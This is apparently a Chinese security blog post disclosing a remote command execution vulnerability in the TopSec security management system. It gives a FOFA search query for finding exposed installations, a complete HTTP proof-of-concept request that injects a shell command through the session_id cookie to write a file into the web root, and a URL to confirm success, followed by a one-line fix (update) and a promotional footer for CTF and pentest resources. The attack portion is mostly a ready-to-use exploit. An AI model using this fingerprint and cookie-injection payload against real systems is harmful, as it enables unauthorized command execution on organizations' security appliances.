文章目录
-
* * 产品简介- 漏洞概述
- 指纹识别
- 漏洞利用
- 修复建议
产品简介
天融信TopSec
安全管理系统,是基于大数据架构,采用多种技术手段收集各类探针设备安全数据,围绕资产、漏洞、攻击、威胁等安全要素进行全面分析,提供统一监测告警、集中策略管控、协同处置流程,实现客户等保合规、资产统一管理、风险一键阻断等。
漏洞概述
安全管理系统存在存在远程命令执行漏洞,通过此漏洞,攻击者可进行文件写入等危险操作,威胁系统安全。
指纹识别
fofa:
title=“Web User Login” && body=“/cgi/maincgi.cgi?Url=VerifyCode”
漏洞利用
poc:
GET /cgi/maincgi.cgi?Url=check HTTP/1.1
Host: 10
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Cookie: session_id_443=1|echo ‘hhh’ >> /www/htdocs/site/image/hhh.txt;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Dnt: 1
Upgrade-Insecure-Requests: 1
Connection: close
验证url:
https://you_ip/site/image/hhh.txt
修复建议
联系软件厂商更新至最新安全版本
【陆上行舟。】
最后
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。
因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。
干货主要有:
①1000+CTF历届题库(主流和经典的应该都有了)
②CTF技术文档(最全中文版)
③项目源码(四五十个有趣且经典的练手项目及源码)
④ CTF大赛、web安全、渗透测试方面的视频(适合小白学习)
⑤ 网络安全学习路线图(告别不入流的学习)
⑥ CTF/渗透测试工具镜像文件大全
⑦ 2023密码学/隐身术/PWN技术手册大全
扫码领取
扫一扫
364
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
